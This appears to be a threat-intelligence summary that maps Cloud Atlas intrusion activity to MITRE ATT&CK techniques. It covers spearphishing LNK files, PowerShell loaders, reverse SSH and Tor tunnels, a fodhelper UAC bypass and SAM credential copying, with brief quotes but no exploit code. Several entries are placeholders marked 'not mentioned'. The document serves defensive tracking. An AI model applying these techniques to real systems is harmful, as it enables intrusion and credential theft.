Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload

MITRE Techniques

• [T1566.001 ] Phishing: Spearphishing Attachment – Initial access was gained by emailing ZIP archives with malicious LNK files attached (‘the attackers emailed a ZIP archive containing an LNK file as an attachment’).
• [T1204.002 ] User Execution: Malicious File – The shortcut relied on the user opening the attachment and executing the malicious LNK (‘archives containing malicious shortcuts’).
• [T1059.001 ] Command and Scripting Interpreter: PowerShell – Malicious LNK files launched PowerShell scripts from external resources (‘covertly execute PowerShell scripts hosted on external resources’).
• [T1059.005 ] Command and Scripting Interpreter: Visual Basic – VBScript was used for tunnel setup and execution (‘run VBS scripts via PAExec or PsExec’).
• [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence was created by adding payloads to Run keys (‘Creates “Run” registry key “YandexBrowser_setup”’).
• [T1112 ] Modify Registry – The malware modified registry settings to ensure startup and persistence (‘Creates “Run” registry key’).
• [T1105 ] Ingress Tool Transfer – Scripts downloaded additional payloads and decoy archives from remote servers (‘Downloads and drops “$temprar.zip”’).
• [T1027 ] Obfuscated Files or Information – Multiple components were encrypted, encoded, or packed to hinder analysis (‘encrypted body of the backdoor’, ‘encoded in base64’).
• [T1021.001 ] Remote Services: Remote Desktop Protocol – Attackers enabled and abused RDP for interactive access (‘allow multiple RDP sessions in Windows 10’).
• [T1218.011 ] System Binary Proxy Execution: Rundll32? – Not explicitly mentioned.
• [T1218.002 ] System Binary Proxy Execution: Control Panel – Privilege escalation and UAC bypass were performed through fodhelper.exe (‘uses a UAC bypass technique via fodhelper.exe’).
• [T1562.001 ] Impair Defenses: Disable or Modify Tools – The script killed WinRAR to conceal activity and removed artifacts (‘executes “taskkill.exe /F /Im winrar.exe”’, ‘searches and deletes’).
• [T1070.004 ] File Deletion – The attack cleaned up infection artifacts to reduce forensic traces (‘Searches and deletes “rar.zip”, “*.pdf.zip” and “*.pdf.lnk”’).
• [T1098 ] Account Manipulation – The script changed permissions on folders to block access to private keys (‘set new access permissions to the folder containing the private key’).
• [T1090.001 ] Proxy: Internal Proxy – RevSocks and SSH tunnels were used as proxy channels for remote access (‘allow direct connection to workstations on the local network’).
• [T1090.003 ] Proxy: Multi-hop Proxy – Reverse SSH tunnels and Tor Hidden Services created layered access paths (‘bypass standard firewall rules’, ‘accessible via RDP from the Tor network’).
• [T1021.004 ] Remote Services: SSH – Reverse SSH tunnels were established from the compromised host to attacker-controlled infrastructure (‘the compromised machine initiates an SSH connection’).
• [T1219 ] Remote Access Software – RevSocks provided remote connectivity and network access (‘installed RevSocks’).
• [T1095 ] Non-Application Layer Protocol – Tunnel traffic and port forwarding were used to move access through non-standard channels (‘forwarding ports to the Tor network’).
• [T1082 ] System Information Discovery – PowerShower collected information about processes, administrator groups, and domain controllers (‘Collect information about running processes, administrator groups, and domain controllers’).
• [T1018 ] Remote System Discovery – PowerShower identified domain controllers and network structure (‘domain controllers’).
• [T1003.001 ] OS Credential Dumping: LSASS Memory – Not explicitly mentioned.
• [T1003.002 ] OS Credential Dumping: Security Account Manager – The credential grabber copied SAM and SECURITY files from Volume Shadow Copy (‘Copies the SAM … and SECURITY system files’).
• [T1003.006 ] OS Credential Dumping: DCSync – Not mentioned.
• [T1003.003 ] OS Credential Dumping: NTDS – Not mentioned.
• [T1134 ] Access Token Manipulation – Not mentioned.
• [T1113 ] Screen Capture – Not mentioned.
• [T1016 ] System Network Configuration Discovery – The browser checker and tunnel setup imply host environment checking, but this technique is not directly stated.
• [T1056.001 ] Input Capture: Keylogging – Not mentioned.
• [T1047 ] Windows Management Instrumentation – Not mentioned.
• [T1543.003 ] Create or Modify System Process: Windows Service – The RDP service was restarted after patching (‘the script restarts the RDP service’).
• [T1484.001 ] Domain or Tenant Policy Modification – Not mentioned.
• [T1046 ] Network Service Discovery – PowerShower and related tooling performed network reconnaissance (‘network reconnaissance’).
• [T1106 ] Native API – Not mentioned.
• [T1135 ] Network Share Discovery – Not mentioned.